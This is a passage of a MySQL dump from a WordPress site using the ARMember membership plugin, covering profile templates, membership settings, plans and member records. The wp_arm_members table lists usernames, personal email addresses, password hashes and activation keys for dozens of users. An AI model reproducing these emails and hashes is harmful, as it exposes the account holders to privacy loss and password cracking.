-- Table structure for table `wp_arm_member_templates`
--

DROP TABLE IF EXISTS `wp_arm_member_templates`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_arm_member_templates` (
  `arm_id` int(11) NOT NULL AUTO_INCREMENT,
  `arm_title` text DEFAULT NULL,
  `arm_slug` varchar(255) DEFAULT NULL,
  `arm_type` varchar(50) DEFAULT NULL,
  `arm_default` int(1) NOT NULL DEFAULT 0,
  `arm_subscription_plan` text DEFAULT NULL,
  `arm_core` int(1) NOT NULL DEFAULT 0,
  `arm_template_html` longtext DEFAULT NULL,
  `arm_ref_template` int(11) NOT NULL DEFAULT 0,
  `arm_options` longtext DEFAULT NULL,
  `arm_html_before_fields` longtext DEFAULT NULL,
  `arm_html_after_fields` longtext DEFAULT NULL,
  `arm_enable_admin_profile` int(1) NOT NULL DEFAULT 0,
  `arm_created_date` datetime NOT NULL DEFAULT '1970-01-01 00:00:00',
  PRIMARY KEY (`arm_id`)
) ENGINE=InnoDB AUTO_INCREMENT=3 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_arm_member_templates`
--

LOCK TABLES `wp_arm_member_templates` WRITE;
/*!40000 ALTER TABLE `wp_arm_member_templates` DISABLE KEYS */;
INSERT INTO `wp_arm_member_templates` VALUES (1,'Default Profile Template','profiletemplate3','profile',1,NULL,1,'<div class=\"arm_profile_detail_wrapper\">\r\n                        <div class=\"arm_profile_picture_block armCoverPhoto\" style=\"{ARM_Profile_Cover_Image}\">\r\n                            <div class=\"arm_profile_picture_block_inner\">\r\n                                <div class=\"arm_profile_header_info\">\r\n                                    <span class=\"arm_profile_name_link\">{ARM_Profile_User_Name}</span>\r\n                                    \r\n                                        {ARM_Profile_Badges}\r\n                                    \r\n                                    <div class=\"armclear\"></div>\r\n                                        <span class=\"arm_user_last_active_text\">{ARM_Profile_Join_Date}</span>\r\n                                    </div>\r\n                                    <div class=\"social_profile_fields\">\r\n                                        {ARM_Profile_Social_Icons}\r\n                                    </div>\r\n                                    <div class=\"armclear\"></div>\r\n                                </div>\r\n                                <div class=\"arm_user_avatar\">\r\n                                    {ARM_Profile_Avatar_Image}\r\n                                </div>\r\n                                {ARM_Cover_Upload_Button}\r\n                            </div>\r\n                            <div class=\"arm_profile_defail_container arm_profile_tabs_container\">\r\n                                <div class=\"arm_profile_field_before_content_wrapper\"></div>\r\n                                <div class=\"arm_profile_tab_detail\" data-tab=\"general\">\r\n                                    <div class=\"arm_general_info_container\">\r\n                                        <table class=\"arm_profile_detail_tbl\">\r\n                                            <tbody><tr><td>Username</td><td>[arm_usermeta meta=\'user_login\']</td></tr><tr><td>Email Address</td><td>[arm_usermeta meta=\'user_email\']</td></tr><tr><td>First Name</td><td>[arm_usermeta meta=\'first_name\']</td></tr><tr><td>Last Name</td><td>[arm_usermeta meta=\'last_name\']</td></tr></tbody>\r\n                                        </table>\r\n                                    </div>\r\n                                </div>\r\n                                <div class=\"arm_profile_field_after_content_wrapper\"></div>\r\n                            </div>\r\n                    </div><div class=\"armclear\"></div>',0,'a:28:{s:16:\"show_admin_users\";i:0;s:11:\"show_badges\";i:1;s:12:\"show_joining\";i:1;s:25:\"hide_empty_profile_fields\";i:0;s:12:\"color_scheme\";s:4:\"blue\";s:11:\"title_color\";s:7:\"#1A2538\";s:14:\"subtitle_color\";s:7:\"#2F3F5C\";s:12:\"border_color\";s:7:\"#005AEE\";s:12:\"button_color\";s:7:\"#005AEE\";s:17:\"button_font_color\";s:7:\"#FFFFFF\";s:12:\"tab_bg_color\";s:7:\"#1A2538\";s:14:\"tab_link_color\";s:7:\"#ffffff\";s:20:\"tab_link_hover_color\";s:7:\"#1A2538\";s:17:\"tab_link_bg_color\";s:7:\"#1A2538\";s:23:\"tab_link_hover_bg_color\";s:7:\"#ffffff\";s:10:\"link_color\";s:7:\"#1A2538\";s:16:\"link_hover_color\";s:7:\"#005AEE\";s:18:\"content_font_color\";s:7:\"#3E4857\";s:12:\"box_bg_color\";s:7:\"#F4F4F4\";s:10:\"title_font\";a:5:{s:11:\"font_family\";s:18:\"Open Sans Semibold\";s:9:\"font_size\";s:2:\"26\";s:9:\"font_bold\";i:1;s:11:\"font_italic\";i:0;s:15:\"font_decoration\";s:0:\"\";}s:13:\"subtitle_font\";a:5:{s:11:\"font_family\";s:18:\"Open Sans Semibold\";s:9:\"font_size\";s:2:\"16\";s:9:\"font_bold\";i:0;s:11:\"font_italic\";i:0;s:15:\"font_decoration\";s:0:\"\";}s:11:\"button_font\";a:5:{s:11:\"font_family\";s:18:\"Open Sans Semibold\";s:9:\"font_size\";s:2:\"16\";s:9:\"font_bold\";i:0;s:11:\"font_italic\";i:0;s:15:\"font_decoration\";s:0:\"\";}s:13:\"tab_link_font\";a:5:{s:11:\"font_family\";s:18:\"Open Sans Semibold\";s:9:\"font_size\";s:2:\"16\";s:9:\"font_bold\";i:1;s:11:\"font_italic\";i:0;s:15:\"font_decoration\";s:0:\"\";}s:12:\"content_font\";a:5:{s:11:\"font_family\";s:18:\"Open Sans Semibold\";s:9:\"font_size\";s:2:\"16\";s:9:\"font_bold\";i:0;s:11:\"font_italic\";i:0;s:15:\"font_decoration\";s:0:\"\";}s:14:\"profile_fields\";a:4:{s:10:\"user_login\";s:10:\"user_login\";s:10:\"user_email\";s:10:\"user_email\";s:10:\"first_name\";s:10:\"first_name\";s:9:\"last_name\";s:9:\"last_name\";}s:13:\"default_cover\";s:72:\"https://gopalak.in/wp-content/uploads/armember/profile_default_cover.png\";s:10:\"custom_css\";s:0:\"\";s:5:\"label\";a:4:{s:10:\"user_login\";s:8:\"Username\";s:10:\"user_email\";s:13:\"Email Address\";s:10:\"first_name\";s:10:\"First Name\";s:9:\"last_name\";s:9:\"Last Name\";}}',NULL,NULL,0,'2023-03-28 07:20:22'),(2,'Default Directory Template','directorytemplate2','directory',1,NULL,1,'',0,'a:27:{s:12:\"color_scheme\";s:4:\"blue\";s:11:\"title_color\";s:7:\"#1A2538\";s:14:\"subtitle_color\";s:7:\"#2F3F5C\";s:12:\"button_color\";s:7:\"#005AEE\";s:17:\"button_font_color\";s:7:\"#FFFFFF\";s:12:\"border_color\";s:7:\"#005AEE\";s:12:\"box_bg_color\";s:7:\"#F4F4F4\";s:12:\"tab_bg_color\";s:7:\"#1A2538\";s:14:\"tab_link_color\";s:7:\"#ffffff\";s:17:\"tab_link_bg_color\";s:7:\"#1A2538\";s:20:\"tab_link_hover_color\";s:7:\"#1A2538\";i:0;s:35:\"tab_link_hover_bg_color] => #ffffff\";s:10:\"link_color\";s:7:\"#1A2538\";s:16:\"link_hover_color\";s:7:\"#005AEE\";s:18:\"content_font_color\";s:7:\"#3E4857\";s:10:\"title_font\";a:5:{s:11:\"font_family\";s:9:\"Helvetica\";s:9:\"font_size\";s:2:\"14\";s:9:\"font_bold\";s:0:\"\";s:11:\"font_italic\";s:0:\"\";s:15:\"font_decoration\";s:0:\"\";}s:13:\"subtitle_font\";a:5:{s:11:\"font_family\";s:9:\"Helvetica\";s:9:\"font_size\";s:2:\"14\";s:9:\"font_bold\";s:0:\"\";s:11:\"font_italic\";s:0:\"\";s:15:\"font_decoration\";s:0:\"\";}s:11:\"button_font\";a:5:{s:11:\"font_family\";s:9:\"Helvetica\";s:9:\"font_size\";s:1:\"1\";s:9:\"font_bold\";s:0:\"\";s:11:\"font_italic\";s:0:\"\";s:15:\"font_decoration\";s:0:\"\";}s:12:\"content_font\";a:5:{s:11:\"font_family\";s:9:\"Helvetica\";s:9:\"font_size\";s:2:\"16\";s:9:\"font_bold\";s:0:\"\";s:11:\"font_italic\";s:0:\"\";s:15:\"font_decoration\";s:0:\"\";}s:12:\"show_joining\";i:1;s:9:\"searchbox\";i:1;s:7:\"sortbox\";i:1;s:14:\"per_page_users\";i:10;s:10:\"pagination\";s:8:\"infinite\";s:17:\"arm_social_fields\";a:3:{s:8:\"facebook\";s:8:\"facebook\";s:7:\"twitter\";s:7:\"twitter\";s:8:\"linkedin\";s:8:\"linkedin\";}s:14:\"profile_fields\";a:2:{s:10:\"first_name\";s:10:\"first_name\";s:9:\"last_name\";s:9:\"last_name\";}s:10:\"custom_css\";s:0:\"\";}',NULL,NULL,0,'2023-03-28 07:20:22');
/*!40000 ALTER TABLE `wp_arm_member_templates` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_arm_members`
--

DROP TABLE IF EXISTS `wp_arm_members`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_arm_members` (
  `arm_member_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `arm_user_id` bigint(20) unsigned NOT NULL,
  `arm_user_login` varchar(60) NOT NULL DEFAULT '',
  `arm_user_pass` varchar(64) NOT NULL DEFAULT '',
  `arm_user_nicename` varchar(50) NOT NULL DEFAULT '',
  `arm_user_email` varchar(100) NOT NULL DEFAULT '',
  `arm_user_url` varchar(100) NOT NULL DEFAULT '',
  `arm_user_registered` datetime NOT NULL DEFAULT '1970-01-01 00:00:00',
  `arm_user_activation_key` varchar(60) NOT NULL DEFAULT '',
  `arm_user_status` int(11) NOT NULL DEFAULT 0,
  `arm_display_name` varchar(250) NOT NULL DEFAULT '',
  `arm_user_type` int(1) NOT NULL DEFAULT 0,
  `arm_primary_status` int(1) NOT NULL DEFAULT 1,
  `arm_secondary_status` int(1) NOT NULL DEFAULT 0,
  `arm_user_plan_ids` text DEFAULT NULL,
  `arm_user_suspended_plan_ids` text DEFAULT NULL,
  PRIMARY KEY (`arm_member_id`),
  KEY `arm_user_login_key` (`arm_user_login`),
  KEY `arm_user_nicename` (`arm_user_nicename`),
  KEY `arm-user-id` (`arm_user_id`)
) ENGINE=InnoDB AUTO_INCREMENT=38 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_arm_members`
--

LOCK TABLES `wp_arm_members` WRITE;
/*!40000 ALTER TABLE `wp_arm_members` DISABLE KEYS */;
INSERT INTO `wp_arm_members` VALUES (1,1,'sitemanager','$P$BNLjTMJnSkVrQm.PEcIRiMhDRuJzMg.','sitemanager','mango@homedirect.in','','2022-01-24 07:19:21','',0,'sitemanager',0,1,0,NULL,NULL),(2,2,'Alpha','$P$Bs2zmcHQs0m.lbKTym0sGpH9DYNOiK1','a','a@gmail.com','','2022-01-24 08:00:11','',0,'Alpha',0,1,0,NULL,NULL),(3,3,'Beta','$P$Bp9pDOisdW.eNmx96dcp60hT8WZxAp/','beta','b@gmail.com','','2022-01-24 08:01:12','',0,'Beta',0,1,0,NULL,NULL),(4,4,'Gamma','$P$BibnDZdZqqY1OuLogIExYwzoKFNMgO.','gamma','g@gmail.com','','2022-01-24 08:01:55','',0,'Gamma',0,1,0,NULL,NULL),(5,5,'mercury','$P$BqYjA/YybkqB1dJbRxOl4E6fS86jZY.','m','mercury@gmail.com','','2022-01-28 10:11:01','',0,'mercury',0,1,0,NULL,NULL),(6,6,'asd','$P$BOtZ.ikT8wCbrhmt4rBbA95fY07LSG0','asd','asd@gmail.com','','2022-01-31 04:53:11','1643604791:$P$Bnh8rDqU5YxXaQDeWDc9xycLuVEntV0',0,'asd',0,1,0,NULL,NULL),(7,8,'Bhhuik','$P$BXRBmzLCs70d3F8GwQuDMhY.FrTVcE1','bhhuik','asjdj@gmail.com','','2022-02-02 08:24:08','1643790248:$P$BVs.lx7AXVW6blnLgLWV7DDDdRms5x/',0,'Bhhuik',0,1,0,NULL,NULL),(8,11,'abcde','$P$BXvV3Y7i7IMPnFUerI6VrWX4LW4lIQ.','abcde','abcde@gmail.com','','2022-02-07 06:51:06','1644216667:$P$Bc/0ZSh0GTeXicV4X58AktMGu/GRyz.',0,'abcde',0,1,0,NULL,NULL),(9,12,'nimyajose1011','$P$BIfOEvC4wcqVriSoTz8dIBfzV1P8zG/','nimyajose1011','nimyajose1011@gmail.com','','2022-02-08 04:35:42','1644294942:$P$BqIFjmci5EioJqO7DD1LDdtyb1Nfat1',0,'nimyajose1011',0,1,0,NULL,NULL),(10,13,'1234','$P$BJkIo8bngcGJ/I/LoYS83DmeGnEfKx/','1234','1234@gmail.com','','2022-02-09 04:25:24','1644380724:$P$BOh8dviooGNMPqHhR5L.dpiVk9CzLd/',0,'1234',0,1,0,NULL,NULL),(11,14,'venkateshavn','$P$BMLl8rTVB9fKprxq0kTyBctwYKthaY.','venkateshavn','venkateshavn@yahoo.com','','2022-02-15 07:15:37','',0,'venkateshavn',0,1,0,NULL,NULL),(12,15,'Nimyajose10','$P$B7sGlLVEsJy8v8yJtMH4P56QbLjVLd.','njjo','Nimyajose10@gmail.com','','2022-02-17 11:51:17','1645768573:$P$BaC1NuwiEiKrQ5LKTUegqbnr5eoo541',0,'Nimyajose10',0,1,0,NULL,NULL),(13,16,'4dm16ec024.nimyajose','$P$BET7Rwu2TXFKhdG7V5gPID88Patasv1','aqw','4dm16ec024.nimyajose@gmail.com','','2022-02-22 05:17:38','',0,'4dm16ec024.nimyajose',0,1,0,NULL,NULL),(14,18,'archana','$P$BLkSHSRmAPyO.TlsJeERa6VHxKxqyI.','testing-store','archana@utfindia.in','','2022-02-23 11:55:01','',0,'archana',0,1,0,NULL,NULL),(15,19,'Asdfghj','$P$BRcmCbFSw6AteP//.XIAUTjiYEYWMm1','mmm','Asdfghj@gmail.com','','2022-02-23 12:03:39','',0,'Asdfghj',0,1,0,NULL,NULL),(16,20,'Pavitra','$P$BgC9MBAyoiR1Sqw.fYejpJgVhE59rD.','testingstore','Pavitra@utfindia.in','','2022-02-23 12:10:13','',0,'Pavitra',0,1,0,NULL,NULL),(17,21,'bhavani','$P$B1MTHeE/OBMmPekz/zpBLOoKs7I4h6.','mainstore','bhavani@utfindia.in','','2022-02-24 05:09:52','',0,'bhavani',0,1,0,NULL,NULL),(18,22,'chethan','$P$BW.SZvSUz6E92l8w0V.y4luJlIJXi6/','test-store-6','chethan@utfinadia.in','','2022-02-24 09:40:33','',0,'chethan',0,1,0,NULL,NULL),(19,23,'sarchana1298','$P$Bef1x4lSSxebAWfCpHQfCSS/03gwf7.','sarchana1298','sarchana1298@gmail.com','','2022-02-24 11:09:53','1645700993:$P$BIXGd8TBVmHCLhRPrIHwQSVqmydKnN/',0,'sarchana1298',0,1,0,NULL,NULL),(20,24,'prajwal','$P$BqbQ.whQHh5N3.HZUX6b55c6ZfCmc2.','prajwal','prajwal@gmail.com','','2022-02-24 13:48:31','1645710511:$P$B.1oFMvjUm6L8WnwUm2ESpLYSiCXRj1',0,'prajwal',0,1,0,NULL,NULL),(21,25,'xyzabc9980','$P$BxJ.UIFdKVqVVIXVvR91WqKk9xEanS/','xyz','xyzabc9980@gmail.com','','2022-03-03 05:15:18','',0,'xyzabc9980',0,1,0,NULL,NULL),(22,26,'nijo101196','$P$BDdv6Je25rawbAViBQ.fHZNho41eAg.','nijo101196','nijo101196@gmail.com','','2022-03-07 06:16:33','1646633793:$P$BzAPNmREb41kQqpbHlLKyYO66lHaUF/',0,'nijo101196',0,1,0,NULL,NULL),(23,27,'rakshithasj1999','$P$BhKWa5af2iwa2BK7Qi.YYMAYNrgFV3/','rakshithasj1999','rakshithasj1999@gmail.com','','2022-03-14 04:58:50','1647233930:$P$BrOm/f5AMUvIJRPj2deOwBWhLeT1qv1',0,'rakshithasj1999',0,1,0,NULL,NULL),(24,28,'utftech9','$P$Bz8gqaVlIIhjkMQxcGQ9GlPbeI7cfy1','utftech','utftech9@gmail.com','','2022-03-15 07:15:44','',0,'utftech9',0,1,0,NULL,NULL),(25,29,'utfhr.333','$P$BxBE6qV/MrO.silmsFmqZ2WFfHGVIZ0','utfhr-333','utfhr.333@gmail.com','','2022-03-15 07:40:31','1647330031:$P$B5Qvyh27jHGZ3jUlLgk2fXqvxYBgb9/',0,'utfhr.333',0,1,0,NULL,NULL),(26,30,'pavvitra','$P$BCPw8GW9GFKE2hlZ9ahBhZBNcNEiHw0','pavvitra','pavvitra@gmail.com','','2022-03-18 15:56:06','1647618966:$P$BnwascdKKvruCBkrX9SmS9Jd3gJoKX1',0,'pavvitra',0,1,0,NULL,NULL),(27,31,'nimya','$P$BIlnF2vDyNZObNK56nGZa7.fX2vkMw1','nimya','nimya@vividhity.com','','2023-03-28 07:30:33','1679988636:$P$B4iycT2vVMUOBimeii7ehOvMaOgsru/',0,'nimya jose',1,1,0,'a:1:{i:0;i:1;}',NULL),(28,32,'nithya','$P$BBxWyp/iS.sl1Go5DFZ3O/XJUSXSp8.','nithya','nithya@gmail.com','','2023-03-29 11:16:51','1680088612:$P$BXoz9lwYXnwvQ4zteVrDrrAOrz/lHo1',0,'nithya nj',1,1,0,NULL,NULL),(29,33,'Pavi','$P$BVuq.PGkhHbLdSUIjm2U0vh0pnq0Xw0','pavi','Pavim123@gmail.com','','2023-07-18 05:24:49','1689657890:$P$BYp3PAHruEanbY8eQiz3KwSH65FP7J0',0,'Pavithra M',1,1,0,NULL,NULL),(30,36,'donalddalton808','','donalddalton808','DonaldDalton808@gmail.com','','2024-10-12 08:50:25','1728723025:$P$BU5Uq.Dsj1sQ6NeYq1fFwjgqTdvf.51',0,'donalddalton808',0,1,0,NULL,NULL),(31,37,'lauragarcia808','','lauragarcia808','LauraGarcia808@gmail.com','','2024-10-17 10:15:59','1729160160:$P$Bk0O1IOJwnkXNh9cbNBVOlzDNZnQPl1',0,'lauragarcia808',0,1,0,NULL,NULL),(32,38,'jefferymarshall808','','jefferymarshall808','JefferyMarshall808@gmail.com','','2024-10-18 04:34:45','1729226085:$P$BRn.aOCsjvQ4TrdKV1j5XZKn5aie8Y/',0,'jefferymarshall808',0,1,0,NULL,NULL),(33,39,'melissawyatt808','','melissawyatt808','MelissaWyatt808@gmail.com','','2024-10-23 10:24:14','1729679055:$P$B/gMVQLkWemHfxSIIYIDQfNxRVHuDb/',0,'melissawyatt808',0,1,0,NULL,NULL),(34,40,'christinewright808','','christinewright808','ChristineWright808@gmail.com','','2024-10-25 10:55:32','1729853732:$P$BvIhIrZ215TXu1KiL0.4tOIPTZa0TI/',0,'christinewright808',0,1,0,NULL,NULL),(35,41,'anthonymiller808','','anthonymiller808','anthonymiller808@gmail.com','','2024-12-06 11:27:53','1733484473:$P$BhmHlxC/AvNymrl.CMOYh/Dsc4ksAY/',0,'anthonymiller808',0,1,0,NULL,NULL),(36,42,'bikash.parida1992','','bikash-parida1992','bikash.parida1992@gmail.com','','2025-01-27 07:27:15','1737962835:$P$B.BJuyx/9bBHp0o/oam1lA9PE.sj9G/',0,'bikash Parida',0,1,0,NULL,NULL),(37,43,'hjain7446','','hjain7446','hjain7446@gmail.com','','2025-02-27 15:35:58','1740670558:$P$BbBFb07n35shvm/t93yWjIs0oQ6qg41',0,'hjain7446',0,1,0,NULL,NULL);
/*!40000 ALTER TABLE `wp_arm_members` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_arm_membership_setup`
--

DROP TABLE IF EXISTS `wp_arm_membership_setup`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_arm_membership_setup` (
  `arm_setup_id` int(11) NOT NULL AUTO_INCREMENT,
  `arm_setup_name` varchar(255) NOT NULL,
  `arm_setup_type` tinyint(1) NOT NULL DEFAULT 0,
  `arm_setup_modules` longtext DEFAULT NULL,
  `arm_setup_labels` longtext DEFAULT NULL,
  `arm_status` int(1) NOT NULL DEFAULT 1,
  `arm_created_date` datetime NOT NULL DEFAULT '1970-01-01 00:00:00',
  PRIMARY KEY (`arm_setup_id`)
) ENGINE=InnoDB AUTO_INCREMENT=2 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_arm_membership_setup`
--

LOCK TABLES `wp_arm_membership_setup` WRITE;
/*!40000 ALTER TABLE `wp_arm_membership_setup` DISABLE KEYS */;
INSERT INTO `wp_arm_membership_setup` VALUES (1,'a',0,'a:5:{s:7:\"modules\";a:4:{s:5:\"plans\";a:1:{i:0;s:1:\"1\";}s:5:\"forms\";s:3:\"101\";s:11:\"plans_order\";a:1:{i:1;s:1:\"1\";}s:14:\"gateways_order\";a:2:{s:6:\"paypal\";s:1:\"1\";s:13:\"bank_transfer\";s:1:\"2\";}}s:5:\"style\";a:6:{s:9:\"plan_skin\";s:5:\"skin3\";s:10:\"hide_plans\";s:1:\"1\";s:18:\"plan_area_position\";s:6:\"before\";s:12:\"gateway_skin\";s:5:\"radio\";s:13:\"content_width\";s:3:\"800\";s:13:\"form_position\";s:4:\"left\";}s:13:\"plans_columns\";s:1:\"3\";s:13:\"selected_plan\";s:1:\"1\";s:16:\"gateways_columns\";s:1:\"1\";}','a:7:{s:13:\"button_labels\";a:1:{s:6:\"submit\";s:6:\"Submit\";}s:21:\"payment_section_title\";s:27:\"Select Your Payment Gateway\";s:22:\"payment_gateway_labels\";a:2:{s:6:\"paypal\";s:6:\"Paypal\";s:13:\"bank_transfer\";s:13:\"Bank Transfer\";}s:22:\"payment_mode_selection\";s:20:\"How you want to pay?\";s:22:\"automatic_subscription\";s:18:\"Auto Debit Payment\";s:27:\"semi_automatic_subscription\";s:14:\"Manual Payment\";s:12:\"summary_text\";s:0:\"\";}',1,'2023-03-28 07:21:53');
/*!40000 ALTER TABLE `wp_arm_membership_setup` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_arm_payment_log`
--

DROP TABLE IF EXISTS `wp_arm_payment_log`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_arm_payment_log` (
  `arm_log_id` int(11) NOT NULL AUTO_INCREMENT,
  `arm_invoice_id` int(11) NOT NULL DEFAULT 0,
  `arm_user_id` bigint(20) NOT NULL DEFAULT 0,
  `arm_first_name` varchar(255) DEFAULT NULL,
  `arm_last_name` varchar(255) DEFAULT NULL,
  `arm_plan_id` bigint(20) NOT NULL DEFAULT 0,
  `arm_old_plan_id` bigint(20) NOT NULL DEFAULT 0,
  `arm_payment_gateway` varchar(50) NOT NULL,
  `arm_payment_type` varchar(50) NOT NULL,
  `arm_token` text DEFAULT NULL,
  `arm_payer_email` varchar(255) DEFAULT NULL,
  `arm_receiver_email` varchar(255) DEFAULT NULL,
  `arm_transaction_id` text DEFAULT NULL,
  `arm_transaction_payment_type` varchar(100) DEFAULT NULL,
  `arm_transaction_status` text DEFAULT NULL,
  `arm_payment_date` datetime NOT NULL DEFAULT '1970-01-01 00:00:00',
  `arm_payment_mode` varchar(255) DEFAULT NULL,
  `arm_payment_cycle` int(11) NOT NULL DEFAULT 0,
  `arm_bank_name` varchar(255) DEFAULT NULL,
  `arm_account_name` varchar(255) DEFAULT NULL,
  `arm_additional_info` longtext DEFAULT NULL,
  `arm_payment_transfer_mode` varchar(255) DEFAULT NULL,
  `arm_amount` double NOT NULL DEFAULT 0,
  `arm_currency` varchar(50) DEFAULT NULL,
  `arm_extra_vars` longtext DEFAULT NULL,
  `arm_response_text` longtext DEFAULT NULL,
  `arm_coupon_code` varchar(255) DEFAULT NULL,
  `arm_coupon_discount` double NOT NULL DEFAULT 0,
  `arm_coupon_discount_type` varchar(50) DEFAULT NULL,
  `arm_coupon_on_each_subscriptions` tinyint(1) DEFAULT 0,
  `arm_is_post_payment` tinyint(1) NOT NULL DEFAULT 0,
  `arm_paid_post_id` bigint(20) NOT NULL DEFAULT 0,
  `arm_is_gift_payment` tinyint(1) NOT NULL DEFAULT 0,
  `arm_is_trial` int(1) NOT NULL DEFAULT 0,
  `arm_display_log` int(1) NOT NULL DEFAULT 1,
  `arm_created_date` datetime NOT NULL DEFAULT '1970-01-01 00:00:00',
  PRIMARY KEY (`arm_log_id`),
  KEY `arm-user-id` (`arm_user_id`),
  KEY `arm-plan-id` (`arm_plan_id`),
  KEY `arm-display-log` (`arm_display_log`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_arm_payment_log`
--

LOCK TABLES `wp_arm_payment_log` WRITE;
/*!40000 ALTER TABLE `wp_arm_payment_log` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_arm_payment_log` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_arm_subscription_plans`
--

DROP TABLE IF EXISTS `wp_arm_subscription_plans`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_arm_subscription_plans` (
  `arm_subscription_plan_id` int(11) NOT NULL AUTO_INCREMENT,
  `arm_subscription_plan_name` varchar(255) NOT NULL,
  `arm_subscription_plan_description` text DEFAULT NULL,
  `arm_subscription_plan_type` varchar(50) NOT NULL,
  `arm_subscription_plan_options` longtext DEFAULT NULL,
  `arm_subscription_plan_amount` double NOT NULL DEFAULT 0,
  `arm_subscription_plan_status` int(1) NOT NULL DEFAULT 1,
  `arm_subscription_plan_role` varchar(100) DEFAULT NULL,
  `arm_subscription_plan_post_id` bigint(20) NOT NULL DEFAULT 0,
  `arm_subscription_plan_gift_status` int(1) NOT NULL DEFAULT 0,
  `arm_subscription_plan_is_delete` int(1) NOT NULL DEFAULT 0,
  `arm_subscription_plan_created_date` datetime NOT NULL DEFAULT '1970-01-01 00:00:00',
  PRIMARY KEY (`arm_subscription_plan_id`)
) ENGINE=InnoDB AUTO_INCREMENT=2 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_arm_subscription_plans`
--

LOCK TABLES `wp_arm_subscription_plans` WRITE;
/*!40000 ALTER TABLE `wp_arm_subscription_plans` DISABLE KEYS */;
INSERT INTO `wp_arm_subscription_plans` VALUES (1,'Free Membership','This is Free Membership Plan.','free','a:1:{s:9:\"pricetext\";s:15:\"Free Membership\";}',0,1,'armember',0,0,0,'2023-03-28 07:20:22');
/*!40000 ALTER TABLE `wp_arm_subscription_plans` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_arm_termmeta`
--

DROP TABLE IF EXISTS `wp_arm_termmeta`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_arm_termmeta` (
  `meta_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `arm_term_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `meta_key` varchar(255) DEFAULT NULL,
  `meta_value` longtext DEFAULT NULL,
  PRIMARY KEY (`meta_id`),
  KEY `arm_term_id` (`arm_term_id`),
  KEY `meta_key` (`meta_key`)
) ENGINE=InnoDB AUTO_INCREMENT=47 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_arm_termmeta`
--

LOCK TABLES `wp_arm_termmeta` WRITE;
/*!40000 ALTER TABLE `wp_arm_termmeta` DISABLE KEYS */;
INSERT INTO `wp_arm_termmeta` VALUES (1,19,'arm_protection','0'),(2,19,'arm_access_plan','0'),(3,20,'arm_protection','0'),(4,20,'arm_access_plan','0'),(5,1,'arm_protection','0'),(6,1,'arm_access_plan','0'),(7,127,'arm_protection','0'),(8,127,'arm_access_plan','0'),(9,128,'arm_protection','0'),(10,128,'arm_access_plan','0'),(11,129,'arm_protection','0'),(12,129,'arm_access_plan','0'),(13,133,'arm_protection','0'),(14,133,'arm_access_plan','0'),(15,136,'arm_protection','0'),(16,136,'arm_access_plan','0'),(17,135,'arm_protection','0'),(18,135,'arm_access_plan','0'),(19,134,'arm_protection','0'),(20,134,'arm_access_plan','0'),(21,15,'arm_protection','0'),(22,15,'arm_access_plan','0'),(23,76,'arm_protection','0'),(24,76,'arm_access_plan','0'),(25,78,'arm_protection','0'),(26,78,'arm_access_plan','0'),(27,79,'arm_protection','0'),(28,79,'arm_access_plan','0'),(29,80,'arm_protection','0'),(30,80,'arm_access_plan','0'),(31,85,'arm_protection','0'),(32,85,'arm_access_plan','0'),(33,137,'arm_protection','0'),(34,137,'arm_access_plan','0'),(35,138,'arm_protection','0'),(36,138,'arm_access_plan','0'),(37,139,'arm_protection','0'),(38,139,'arm_access_plan','0'),(39,140,'arm_protection','0'),(40,140,'arm_access_plan','0'),(41,141,'arm_protection','0'),(42,141,'arm_access_plan','0'),(43,142,'arm_protection','0'),(44,142,'arm_access_plan','0'),(45,143,'arm_protection','0'),(46,143,'arm_access_plan','0');
/*!40000 ALTER TABLE `wp_arm_termmeta` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_bookacti_activities`
--

DROP TABLE IF EXISTS `wp_bookacti_activities`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_bookacti_activities` (
  `id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `title` text DEFAULT NULL,
  `duration` varchar(12) NOT NULL DEFAULT '000.01:00:00',
  `color` varchar(9) NOT NULL DEFAULT '#3a87ad',
  `availability` mediumint(9) unsigned NOT NULL DEFAULT 0,
  `active` tinyint(1) NOT NULL DEFAULT 1,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
